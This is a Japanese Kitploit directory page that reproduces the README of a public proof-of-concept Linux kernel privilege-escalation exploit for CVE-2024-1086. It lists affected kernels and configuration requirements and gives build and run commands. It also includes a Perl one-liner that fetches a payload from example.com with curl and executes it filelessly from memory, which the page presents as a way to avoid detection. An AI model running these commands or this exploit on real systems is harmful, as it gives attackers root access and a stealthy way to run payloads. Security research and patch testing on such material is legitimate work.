Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-1086 — CVE-2024-1086 の汎用ローカル権限昇格 Proof-of-Concept エクスプロイト。v5.14 から v6.6 までのほとんどの Linux カーネルで動作し、Debian、Ubuntu、KernelCTF を含みます。KernelCTF イメージでの成功率は 99.4% です。 | Kitploit
ツール/GitHubGitHub/notselwyn/cve-2024-1086
特権昇格脆弱性分析エクスプロイトペネトレーションテスト論文と研究学習と教育バイナリエクスプロイト
GitHubnotselwyn/cve-2024-1086

CVE-2024-1086

CVE-2024-1086 の汎用ローカル権限昇格 Proof-of-Concept エクスプロイト。v5.14 から v6.6 までのほとんどの Linux カーネルで動作し、Debian、Ubuntu、KernelCTF を含みます。KernelCTF イメージでの成功率は 99.4% です。

リポジトリを見る
2.5k3302年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2024-1086

CVE-2024-1086 の汎用ローカル権限昇格 Proof-of-Concept エクスプロイトです。Debian、Ubuntu、KernelCTF を含む、v5.14 から v6.6 までのほとんどの Linux カーネルで動作します。KernelCTF イメージでの成功率は 99.4% です。

https://github.com/Notselwyn/CVE-2024-1086/assets/68616630/a3d43951-94ab-4c09-a14b-07b81f89b3de

ブログ記事 / 解説

このエクスプロイトの完全な解説(背景情報や役立つ図が多数含まれています)は、Flipping Pages ブログ記事 にあります。

影響を受けるバージョン

このエクスプロイトは、v5.14(含む)から v6.6(含む)までのバージョンに影響します。ただし、パッチ適用済みブランチ v5.15.149>、v6.1.76>、v6.6.15> は除きます。これらのバージョン向けのパッチは 2024 年 2 月にリリースされました。根本的な脆弱性は、v3.15 から v6.8-rc1 までのすべてのバージョン(パッチ適用済みの安定版ブランチを除く)に影響します。

注意事項:

  • このエクスプロイトは、kconfig CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y が設定された v6.4> カーネルでは動作しません(Ubuntu v6.5 を含みます)。
  • このエクスプロイトは、ユーザー名前空間(kconfig CONFIG_USER_NS=y)、そのユーザー名前空間が非特権であること(sh コマンド sysctl kernel.unprivileged_userns_clone = 1)、および nf_tables が有効であること(kconfig CONFIG_NF_TABLES=y)を必要とします。デフォルトでは、これらはすべて Debian、Ubuntu、KernelCTF で有効です。他のディストリビューションはテストされていませんが、動作する可能性もあります。さらに、このエクスプロイトは x64/amd64 でのみテストされています。
  • このエクスプロイトは、ネットワークアクティビティが多いシステムでは 非常に 不安定になる可能性があります。
    • WiFi アダプタを搭載したシステムで、使用率の高い WiFi ネットワークに囲まれている場合、非常に不安定になります。
    • テストデバイスでは、BIOS から WiFi アダプタをオフにしてください。
  • エクスプロイト実行後のカーネルパニック(システムクラッシュ)は副作用であり、エクスプロイトの悪意のある使用を防ぐために意図的に修正されていません(つまり、悪用の試みはより目立つようになり、実世界の運用では非現実的になるはずです)。それでも、root シェルが機能し、ディスクを介した永続化が可能であるため、ラボ環境での実証可能な Proof-of-Concept としては機能します。

使い方

設定

デフォルト値は、ローカルシェルを持つ Debian、Ubuntu、KernelCTF でそのまま動作するはずです。テストされていないセットアップ/ディストリビューションでは、kconfig の値が対象カーネルと一致していることを確認してください。これらは src/config.h で指定できます。32GiB を超える物理メモリを搭載したマシンでエクスプロイトを実行する場合は、CONFIG_PHYS_MEM を増やしてください。 SSH(テストマシンへの)またはリバースシェル経由でエクスプロイトを実行する場合は、不要なネットワークアクティビティを避けるために CONFIG_REDIRECT_LOG を 1 に切り替えるとよいでしょう。

ビルド

これが現実的でない場合は、デフォルト設定のコンパイル済み x64 バイナリがあります。

root@kitploit:~
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make

バイナリ: CVE-2024-1086/exploit

実行

エクスプロイトの実行も同様に簡単です:

root@kitploit:~
./exploit

ファイルレス実行もサポートされています。検出を回避する必要があるペンテスト状況に備えています。ただし、ターゲットに Perl がインストールされている必要があります:

root@kitploit:~
perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

免責事項

このソフトウェアディレクトリ/フォルダ/リポジトリ(「リポジトリ」)内のプログラムおよびスクリプト(「プログラム」)は、教育/研究目的でのみ公開、開発、配布されています。私(「作成者」)は、このリポジトリ内のプログラムの悪意のある使用または違法な使用を容認しません。その意図は研究を共有することであり、違法行為を行うことではないからです。私は、このリポジトリ内のプログラムを使用してあなたが行ういかなる行為についても法的責任を負いません。

ツールをダウンロード